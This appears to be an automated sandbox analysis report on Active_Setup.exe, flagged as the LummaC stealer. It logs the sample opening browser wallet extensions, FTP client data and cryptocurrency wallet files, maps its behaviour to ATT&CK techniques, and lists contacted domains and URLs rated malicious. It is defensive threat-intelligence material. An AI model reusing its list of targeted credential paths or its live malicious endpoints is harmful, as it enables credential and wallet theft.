              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1860274897.0000000000BD4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Active_Setup.exe PID: 7532, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: Active_Setup.exe PID: 7532, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FC30D0 _memset,_memset,_strncmp,_strncmp,htons,bind,bind,htons,htons,bind,_memset,getsockname,WSAGetLastError,WSAGetLastError,0_2_00FC30D0

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              Process Injection              		221
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts12
              Command and Scripting Interpreter              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Process Injection              		LSASS Memory1
              Query Registry              		Remote Desktop Protocol41
              Data from Local System              		2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts12
              Native API              		Logon Script (Windows)Logon Script (Windows)11
              Deobfuscate/Decode Files or Information              		Security Account Manager241
              Security Software Discovery              		SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook3
              Obfuscated Files or Information              		NTDS221
              Virtualization/Sandbox Evasion              		Distributed Component Object ModelInput Capture114
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets2
              Process Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
              Application Window Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync12
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem34
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Active_Setup.exe18%ReversingLabsWin32.Trojan.Generic

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              cryofficesj.click0%Avira URL Cloudsafe
              https://cegu.shop/100%Avira URL Cloudmalware
              https://klipvumisui.shop/int_clp_sha.txtn8J100%Avira URL Cloudmalware
              https://cryofficesj.click/api0%Avira URL Cloudsafe
              https://dfgh.online100%Avira URL Cloudmalware
              https://cryofficesj.click/s0%Avira URL Cloudsafe
              https://klipvumisui.shop/100%Avira URL Cloudmalware
              https://dfgh.online/invoker.php?compname=100%Avira URL Cloudmalware
              https://cryofficesj.click/apij0%Avira URL Cloudsafe
              https://dfgh.online/100%Avira URL Cloudmalware
              https://cryofficesj.click/apipXQ0%Avira URL Cloudsafe
              https://dfgh.online/invoker.php?compName=user-PC100%Avira URL Cloudmalware
              https://cryofficesj.click/api_0%Avira URL Cloudsafe
              https://cryofficesj.click/0%Avira URL Cloudsafe
              https://dfgh.online/invoker.php?compName=user-PCt100%Avira URL Cloudmalware
              https://klipvumisui.shop/int_clp_sha.txtG3100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              cegu.shop
              		185.161.251.21
              		truefalse
                		high
                cryofficesj.click
                		188.114.97.3
                		truetrue
                  		unknown
                  klipvumisui.shop
                  		104.21.37.128
                  		truefalse
                    		high
                    dfgh.online
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      cryofficesj.clicktrue
                      • Avira URL Cloud: safe
                      		unknown
                      https://cryofficesj.click/apitrue
                      • Avira URL Cloud: safe
                      		unknown
                      rabidcowse.shopfalse
                        		high
                        wholersorie.shopfalse
                          		high
                          cloudewahsj.shopfalse
                            		high
                            noisycuttej.shopfalse
                              		high
                              nearycrepso.shopfalse
                                		high
                                https://cegu.shop/8574262446/ph.txtfalse
                                  		high
                                  framekgirus.shopfalse
                                    		high
                                    tirepublicerj.shopfalse
                                      		high
                                      abruptyopsn.shopfalse
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabActive_Setup.exe, 00000000.00000003.1790143337.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790243068.0000000003ADA000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/ac/?q=Active_Setup.exe, 00000000.00000003.1790143337.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790243068.0000000003ADA000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/Licensepowershell.exe, 00000004.00000002.1943309782.0000000005BBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://cegu.shop/Active_Setup.exe, 00000000.00000002.1934142517.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1928822586.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1933387895.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://dfgh.online/invoker.php?compName=powershell.exe, 00000004.00000002.1940996495.0000000004F1A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Active_Setup.exe, 00000000.00000003.1790143337.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790243068.0000000003ADA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Active_Setup.exe, 00000000.00000003.1802226156.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790698899.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790589203.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1802125356.0000000003AE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.openssl.org/support/faq.htmlActive_Setup.exefalse
                                                      		high
                                                      https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.1940996495.0000000004B51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://x1.c.lencr.org/0Active_Setup.exe, 00000000.00000003.1812503861.0000000003ACB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://x1.i.lencr.org/0Active_Setup.exe, 00000000.00000003.1812503861.0000000003ACB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallActive_Setup.exe, 00000000.00000003.1790698899.0000000003AC3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchActive_Setup.exe, 00000000.00000003.1790143337.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790243068.0000000003ADA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://contoso.com/powershell.exe, 00000004.00000002.1943309782.0000000005BBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1943309782.0000000005BBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://dfgh.onlinepowershell.exe, 00000004.00000002.1940996495.0000000004CA6000.00000004.00000800.00020000.00000000.sdmptrue
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    https://dfgh.online/invoker.php?compname=powershell.exe, 00000004.00000002.1944197772.0000000007101000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    https://support.mozilla.org/products/firefoxgro.allActive_Setup.exe, 00000000.00000003.1816838527.0000000003BBE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1940996495.0000000004B51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://klipvumisui.shop/int_clp_sha.txtActive_Setup.exe, 00000000.00000003.1928822586.0000000000B77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1943309782.0000000005BBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoActive_Setup.exe, 00000000.00000003.1790143337.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790243068.0000000003ADA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1940996495.0000000004CA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1940996495.0000000004CA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://go.micropowershell.exe, 00000004.00000002.1940996495.0000000004FFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://cryofficesj.click/sActive_Setup.exe, 00000000.00000003.1877831557.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1881263103.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1860274897.0000000000BF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://curl.haxx.se/docs/http-cookies.html#Active_Setup.exefalse
                                                                                      		high
                                                                                      https://contoso.com/Iconpowershell.exe, 00000004.00000002.1943309782.0000000005BBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Active_Setup.exe, 00000000.00000003.1790143337.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790243068.0000000003ADA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://crl.rootca1.amazontrust.com/rootca1.crl0Active_Setup.exe, 00000000.00000003.1812503861.0000000003ACB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.microsoft.powershell.exe, 00000004.00000002.1944489969.000000000729F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
